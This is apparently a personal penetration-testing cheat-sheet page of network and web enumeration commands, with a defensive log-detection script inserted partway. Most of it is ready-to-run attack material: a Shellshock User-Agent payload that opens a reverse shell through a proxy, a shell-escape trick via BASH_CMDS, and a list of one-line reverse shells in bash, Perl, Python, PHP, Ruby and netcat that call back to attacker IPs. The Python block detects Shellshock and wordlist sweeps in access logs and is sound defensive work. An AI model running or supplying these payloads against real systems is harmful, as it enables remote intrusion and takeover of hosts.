ENUM4LYF

This is going to be an always *under construction* sort of page.
My favorite enumeration techniques will slowly appear here with more and more explanations to follow – remember #DontWaitEnumerate

// Find out what’s connected
netdiscover -r 192.168.0.0/16

// My favorite Nmap scan

nmap -sS -A -O -n -T5 192.168.1.131

-sS = SYN scan (half-open)
-A = aggressive: OS detection, version detection, script scanning and traceroute
-O = Operating system detection
-n = no DNS resolution
-T5 = timing template 5 ("insane": fastest and noisiest)

// use curl to fetch the robots.txt file (-k accepts a self-signed certificate)

curl -k https://192.168.1.131/robots.txt

// example of using curl through a squid proxy to get a bash shell from a Shellshock-vulnerable CGI script (Shellshock reverse TCP shell)

curl -x [proxyIP:squidport] -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.1.128/9999 0>&1" http://192.168.1.129/cgi-bin/status

-x = use proxy
-H = set a request header (here the User-Agent header carrying the payload)

// bruteforce fuzzing of web content

gobuster -u [targetIP] -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e

-u = Target URL
-w = Wordlist
-s = status codes to report, e.g. -s '200,204'
-e = expanded mode (print full URLs in the results)
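An added example (not from the original page) of the defender's side of the two web techniques above: detection logic run over web-server access-log lines that flags the Shellshock `() {` header payload aimed at /cgi-bin and a gobuster-style wordlist sweep (a burst of 404s from one source). The log lines, IPs, User-Agent strings and the 404 threshold are constructed sample values.

```python
import re
from collections import Counter

# Constructed access-log lines in Apache/nginx combined format (sample data, not from the page).
_LOG = '{ip} - - [01/Jan/2024:10:00:{s:02d} +0000] "GET {path} HTTP/1.1" {st} 0 "-" "{ua}"'
SAMPLE_LOG = "\n".join(
    [_LOG.format(ip="10.0.0.5", s=0, path="/cgi-bin/status", st=200,
                 ua="() { ignored;};/bin/bash -i >& /dev/tcp/10.0.0.9/9999 0>&1"),
     _LOG.format(ip="10.0.0.7", s=1, path="/robots.txt", st=200, ua="curl/7.88.1"),
     _LOG.format(ip="10.0.0.7", s=2, path="/index.html", st=200, ua="Mozilla/5.0")]
    + [_LOG.format(ip="10.0.0.8", s=3 + i, path=f"/{w}", st=404, ua="gobuster/3.1")
       for i, w in enumerate(["admin", "backup", "cgi-bin", "old", "test", "tmp"])]
    + [_LOG.format(ip="10.0.0.8", s=9, path="/robots.txt", st=200, ua="gobuster/3.1")]
)

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Shellshock signature: a bash function definition "() {" smuggled into a request field.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def parse_line(line):
    """Return the fields of one combined-format line as a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock(log_text):
    """(source IP, requested path) for every line carrying a Shellshock-style payload."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and SHELLSHOCK_RE.search(rec["ua"] + rec["ref"] + rec["req"]):
            hits.append((rec["ip"], rec["req"].split()[1]))
    return hits

def find_sweeps(log_text, min_404=5):
    """IPs whose 404 count reaches the threshold: the footprint of a wordlist sweep."""
    counts = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == "404":
            counts[rec["ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= min_404}

if __name__ == "__main__":
    print("shellshock attempts:", find_shellshock(SAMPLE_LOG))
    print("wordlist sweeps:", find_sweeps(SAMPLE_LOG))
```

On a real server, feed the access log instead of SAMPLE_LOG and tune min_404 to the site's normal error rate; a Shellshock hit is worth an alert on its own, since legitimate clients never send `() {` in a header.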

// further enumeration
enum4linux [target]

// connect to a MySQL server
mysql -h localhost -P 3306 -u root -p [db_name]

// Mount a shared folder that is not secured
mkdir /mnt/cifs
mount -t cifs //[target-ip]/share$ -o username=guest /mnt/cifs/
ls /mnt/cifs/

// Attempt to ssh
ssh user@[targetIP]
then enter the password when prompted

// once in, first things first – try sudo su with the same password!!! //

// Also try [p00p]

BASH_CMDS[poop]=/bin/bash
poop
cd /tmp
/tmp$ ls -lah
total 8.0K
4.0K drwxrwxrwt 2 root root 4.0K

// *** REVERSE SHELL CHEATS *** //
Another place to look is PentestMonkey's reverse shell cheat sheet!

// BASH SHELLS
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

// PERL
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

// PYTHON
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

// PHP
php -r '$sock=fsockopen("192.168.1.1",9999);exec("/bin/sh -i <&3 >&3 2>&3");'
If you want a .php file to upload, see PentestMonkey's more featureful and robust php-reverse-shell.

// RUBY
ruby -rsocket -e 'f=TCPSocket.open("192.168.1.1",9999).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

// NETCAT (requires a netcat build that supports -e)
nc -e /bin/sh 192.168.1.1 9999
